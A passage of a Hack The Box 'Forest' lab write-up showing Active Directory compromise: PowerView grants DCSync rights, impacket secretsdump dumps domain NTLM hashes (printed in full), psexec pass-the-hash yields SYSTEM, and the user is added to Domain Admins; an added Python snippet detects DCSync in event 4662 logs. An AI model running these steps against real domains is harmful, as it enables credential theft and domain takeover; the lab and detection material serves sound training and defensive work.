*Evil-WinRM* PS C:\Users\u505\Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\u505', $SecPassword)
*Evil-WinRM* PS C:\Users\u505\Documents> $Cred

UserName                     Password
--------                     --------
HTB.LOCAL\u505  System.Security.SecureString
To execute the Add-DomainObjectAcl command we need the PowerView script.
u505@kali:~/HTB/Machines/Forest$ cp /opt/utils/PowerSploit/Recon/PowerView.ps1 ./
We upload it to the target.
*Evil-WinRM* PS C:\Users\u505\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\u505\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\u505\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\u505\Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity u505 -Rights DCSync
Dump hashes
We dump the NTLM hashes (-just-dc-ntlm avoids dumping the Kerberos keys as well).
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/secretsdump.py -dc-ip 10.10.10.161 -just-dc-ntlm u505@10.10.10.161
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
u505:7601:aad3b435b51404eeaad3b435b51404ee:aa693a555524c4d32c19701a0187a1fd:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:3475df7cb6fac4d18d3c38cc0fc0b362:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Cleaning up...
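From the defender's side, the secretsdump run above is a DCSync: the DC records it as Security event 4662, with one of the replication extended rights (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All GUIDs) exercised by an account that is not a domain controller. As an added example (not part of the original write-up), this Python applies that check to a handful of constructed, simplified event records; the only DC account on this box is FOREST$, and the GUIDs are the well-known schema values.

```python
# Extended-right GUIDs a DCSync needs on the domain object (well-known AD schema values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)
CONTROL_ACCESS = 0x100  # AccessMask bit for "control access" (extended right) in event 4662

# The only domain controller in the write-up's domain; the DC-to-DC replication it does is expected.
DC_ACCOUNTS = {"FOREST$"}


def _mask(value):
    """AccessMask is an int in the samples below; exported logs carry it as a hex string like "0x100"."""
    return int(value, 16) if isinstance(value, str) else int(value or 0)


def is_dcsync_like(event, expected_replicators):
    """True when a 4662 event shows a replication extended right exercised by an
    account that is not a known domain controller."""
    if event.get("EventID") != 4662:
        return False
    if not (_mask(event.get("AccessMask")) & CONTROL_ACCESS):
        return False
    props = str(event.get("Properties", "")).lower()
    if not any(guid in props for guid in REPLICATION_GUIDS):
        return False
    return event.get("SubjectUserName") not in expected_replicators


def find_dcsync(events, expected_replicators):
    """Return the subject account of every DCSync-like event, in log order."""
    return [e["SubjectUserName"] for e in events if is_dcsync_like(e, expected_replicators)]


# Constructed, simplified 4662 records: field names follow the Windows event, the
# values are made up apart from the account names, which are the write-up's.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": 0x100,
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},   # DC replicating: normal
    {"EventID": 4662, "SubjectUserName": "u505", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},   # the secretsdump run above
    {"EventID": 4662, "SubjectUserName": "u505", "AccessMask": 0x20,
     "Properties": "Write Property {00000000-0000-0000-0000-000000000000}"},   # placeholder GUID, unrelated write
    {"EventID": 4624, "SubjectUserName": "u505"},                              # a logon, not an object access
]

if __name__ == "__main__":
    print("DCSync-like activity by:", find_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS))
```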
Access as administrator
We have the Administrator's hash, so we can log in directly with psexec.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file SgKAtGFA.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service KPmZ on 10.10.10.161.....
[*] Starting service KPmZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
We add our user u505 to the Domain Admins group. At this point we could grab the root flag.
C:\Windows\system32>net group "Domain Admins" /add u505
The command completed successfully.

C:\Windows\system32>net group "Domain Admins"
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            u505
The command completed successfully.

C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.10.10.161.....
[*] Stopping service KPmZ.....
[*] Removing service KPmZ.....
[*] Removing file SgKAtGFA.exe.....
Root flag
psexec
We can use psexec to connect and grab the root flag.
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/psexec.py u505@10.10.10.161
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file zsxDuvFg.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service OzJU on 10.10.10.161.....
[*] Starting service OzJU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
<ROOT_FLAG>
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.10.10.161.....
[*] Stopping service OzJU.....
[*] Removing service OzJU.....
[*] Removing file zsxDuvFg.exe.....
wmiexec
u505@kali:~/HTB/Machines/Forest$ /opt/utils/impacket/examples/wmiexec.py u505@10.10.10.161
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\u505

C:\>type C:\Users\Administrator\Desktop\root.txt
<ROOT_FLAG>
C:\>exit
References
- Domain Enumeration + Exploitation
- PowerView-3.0 tips and tricks
- winPEAS
- https://github.com/BloodHoundAD/BloodHound
- BloodHound with Kali Linux: 101
- https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators
Daniel Simao 23:32, 4 April 2020 (EDT)